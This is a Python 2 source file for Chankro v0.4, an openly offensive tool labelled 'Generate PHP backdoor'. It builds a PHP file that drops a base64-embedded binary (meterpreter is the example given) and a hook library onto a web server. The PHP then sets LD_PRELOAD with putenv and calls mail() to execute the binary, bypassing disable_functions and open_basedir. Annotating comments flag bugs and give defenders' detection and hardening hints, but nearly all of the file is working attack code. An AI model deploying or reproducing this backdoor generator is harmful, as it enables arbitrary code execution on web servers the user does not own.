chankro.py
######## Chankro v0.4 #######
# [+] Bypass disable_functions
# [+] Bypass open_basedir
##############################
# @TheXC3LL #
##############################
import argparse
import base64
import os
# Flat Python 2 script (print statements): it reads a local binary and one of
# the bundled hookNN.so files, base64-encodes both, and writes a single PHP
# file that embeds them.
#
# Command-line interface. argparse marks none of the options as required, but
# the checks below exit when any of the four is missing.
parser = argparse.ArgumentParser(description='Generate PHP backdoor')
parser.add_argument('--arch', dest='arch',help='Architecture (32 or 64)')
parser.add_argument('--input', dest='meter', help='Binary to be executed (p.e. meterpreter)')
parser.add_argument('--output', dest='out', help='PHP filename')
parser.add_argument('--path', dest='pati', help='Absolute path')
args = parser.parse_args()

# path where the tool is installed
script_path = os.path.dirname(os.path.realpath(__file__))

print "\n\n -=[ Chankro ]=-\n -={ @TheXC3LL }=-\n\n"

# --input: the binary is read whole and kept as base64 text.
# NOTE(review): every error path in this script calls exit() with no argument,
# so the process ends with status 0 even on failure.
if not args.meter:
    print "[!] Error: please select a valid file as input"
    exit()
try:
    with open(args.meter, "rb") as file:
        encoded_shell = base64.b64encode(file.read())
except:
    # NOTE(review): bare except hides the real cause and also catches
    # KeyboardInterrupt/SystemExit.
    print "[!] Error: file could not be opened"
    exit()

# --output: opened for writing (truncating any existing file) BEFORE the
# --arch and --path checks, so a later validation failure leaves an empty
# output file behind and the handle is never closed explicitly.
if not args.out:
    print "[!] Error: please select a valid file as output"
    exit()
try:
    if (os.path.isabs(args.out)):
        outfile = open(args.out, "w") # absolute path provided
    else:
        outfile = open(os.getcwd() + '/' + args.out, "w") # relative path provided
except:
    print "[!] Error: file could not be created"
    exit()

# --arch: only the literal strings "32" and "64" are accepted; the value picks
# hook32.so or hook64.so from the directory this script lives in.
if not args.arch:
    print "[!] Error: select architecture (64 or 32)"
    exit()
else:
    if args.arch != "32" and args.arch != "64":
        print "[!] Error: unknow architecture"
        exit()
    else:
        archi = script_path + "/hook" + args.arch + ".so"

# --path: directory on the target host that the generated PHP writes into.
# The value is only checked for presence; it is concatenated as-is into the
# PHP source below.
if not args.pati:
    print "[!] Error: remote path"
    exit()

# No try/except here: a missing hookNN.so raises an uncaught IOError.
with open(archi, "rb") as bicho:
    encoded_bicho = base64.b64encode(bicho.read())

# Generated PHP, in order:
#   1. $hook / $meterpreter hold the two base64 blobs.
#   2. Both are decoded and written to <path>/chankro.so and
#      <path>/acpid.socket.
#   3. putenv() sets CHANKRO to the acpid.socket path and LD_PRELOAD to the
#      chankro.so path.
#   4. mail() is called with dummy arguments.
# NOTE(review): the hook library's source is not visible here; presumably it
# reads CHANKRO to locate the binary to run. On Unix, PHP's mail() normally
# starts the configured sendmail binary as a child process, which would
# inherit LD_PRELOAD - confirm against the hook source.
# Defender view: what this output leaves behind is two new files named
# chankro.so and acpid.socket in a PHP-writable directory, a PHP file with
# two long base64 string literals, and putenv('LD_PRELOAD=...') followed by
# mail(). Where the application does not need them, listing putenv and mail
# in disable_functions removes the primitives this output relies on; alerting
# on LD_PRELOAD in the environment of children of the PHP worker covers the
# rest.
head = "<?php\n $hook = '" + encoded_bicho + "';\n"
body1 = "$meterpreter = '" + encoded_shell + "';\n"
body2 = "file_put_contents('" + args.pati + "/chankro.so', base64_decode($hook));\n"
body3 = "file_put_contents('" + args.pati + "/acpid.socket', base64_decode($meterpreter));\n"
cosa3 = "putenv('CHANKRO=" + args.pati + "/acpid.socket');\n"
tail1 = "putenv('LD_PRELOAD=" + args.pati + "/chankro.so');\n"
tail2 = "mail('a','a','a','a');?>"

# Summary for the operator, then the PHP is written in one call.
print "[+] Binary file: " + args.meter
print "[+] Architecture: x" + args.arch
print "[+] Final PHP: " + args.out + "\n\n"
outfile.write(head + body1 + body2 + body3 + cosa3 + tail1 + tail2)
outfile.close()
print "[+] File created!"